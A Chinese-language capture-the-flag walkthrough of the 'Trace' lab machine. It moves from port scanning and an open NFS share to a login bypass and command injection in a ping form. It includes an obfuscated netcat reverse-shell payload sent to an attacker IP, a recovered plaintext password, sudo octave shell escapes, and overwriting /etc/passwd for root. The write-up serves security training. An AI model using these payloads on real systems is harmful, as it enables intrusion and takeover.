# 靶场搭建
下载:Trace
Nat,IP: 192.168.1.180
# 渗透过程
# 信息初收集
PORT STATE SERVICE VERSION | |
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0) | |
| ssh-hostkey: | |
| 3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA) | |
| 256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA) | |
|_ 256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519) | |
80/tcp open http Apache httpd 2.4.56 ((Debian)) | |
|_http-server-header: Apache/2.4.56 (Debian) | |
|_http-title: Apache2 Debian Default Page: It works | |
111/tcp open rpcbind 2-4 (RPC #100000) | |
| rpcinfo: | |
| program version port/proto service | |
| 100000 2,3,4 111/tcp rpcbind | |
| 100000 2,3,4 111/udp rpcbind | |
| 100000 3,4 111/tcp6 rpcbind | |
| 100000 3,4 111/udp6 rpcbind | |
| 100003 3 2049/udp nfs | |
| 100003 3 2049/udp6 nfs | |
| 100003 3,4 2049/tcp nfs | |
| 100003 3,4 2049/tcp6 nfs | |
| 100005 1,2,3 37577/tcp mountd | |
| 100005 1,2,3 45651/udp6 mountd | |
| 100005 1,2,3 52567/tcp6 mountd | |
| 100005 1,2,3 59427/udp mountd | |
| 100021 1,3,4 34220/udp nlockmgr | |
| 100021 1,3,4 36633/tcp nlockmgr | |
| 100021 1,3,4 37475/tcp6 nlockmgr | |
| 100021 1,3,4 40397/udp6 nlockmgr | |
| 100227 3 2049/tcp nfs_acl | |
| 100227 3 2049/tcp6 nfs_acl | |
| 100227 3 2049/udp nfs_acl | |
|_ 100227 3 2049/udp6 nfs_acl | |
2049/tcp open nfs 3-4 (RPC #100003) | |
33623/tcp open mountd 1-3 (RPC #100005) | |
34597/tcp open mountd 1-3 (RPC #100005) | |
36633/tcp open nlockmgr 1-4 (RPC #100021) | |
37577/tcp open mountd 1-3 (RPC #100005) |
有 NFS 系统,查一下
┌──(root㉿kali)-[~/Desktop] | |
└─# showmount -e 192.168.1.180 | |
Export list for 192.168.1.180: | |
/var/www/html * |
挂载: mount -t nfs 192.168.1.180:/var/www/html /tmp/gddfeng -nolock
以 www-data
用户进入 su -s /bin/bash www-data
查看 7828d2f51ceb3aefbd12aa383ec9d5e9/index.html
文件,拿到域名 staffserve.nyx
收集子域: gobuster vhost -u staffserve.nyx -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt --append-domain
, 拿到子域: admin3.staffserve.nyx
登录查看下数据包,POST 数组数据: login=admin&password[]=admin
拿到新的提示: networkteste.nyx
枚举一下子域: ping.networkteste.nyx
,访问发现是 RCE: curl 'http://ping.networkteste.nyx/' -X POST --data-raw 'pinger=127.0.0.1%7Cid&submitt=Ping'
弹 shell: curl 'http://ping.networkteste.nyx/' -X POST --data-raw 'pinger=127.0.0.1|bas\h -c "/usr/b?n/n[c] -e /\\b\i\n/////s\h 192.168.1.129 4444"&submitt=Ping'
查看 /var/www/site1/random.php
发现了密码: m3g4S3cuR3p4zzW0rd
www-data@trace:/var/www/site1$ cat /etc/passwd | grep sh$ | |
root:x:0:0:root:/root:/bin/bash | |
yan:x:1000:1000:yan,,,:/home/yan:/bin/bash | |
nel:x:1001:1001::/home/nel:/bin/bash |
su 一下, yan
登录进去了
# 提权
sudo -u nel octave --eval 'system("/bin/sh")'
拿到 nel 的 shell
保存下 passwd 文件后修改一下 root 的密码,然后用 sudo wuzz 访问 web 服务中的 passwd 文件,然后覆盖掉目标机器上的 passwd。用预设的密码连上去就 OK 了
然后 su 过去直接拿下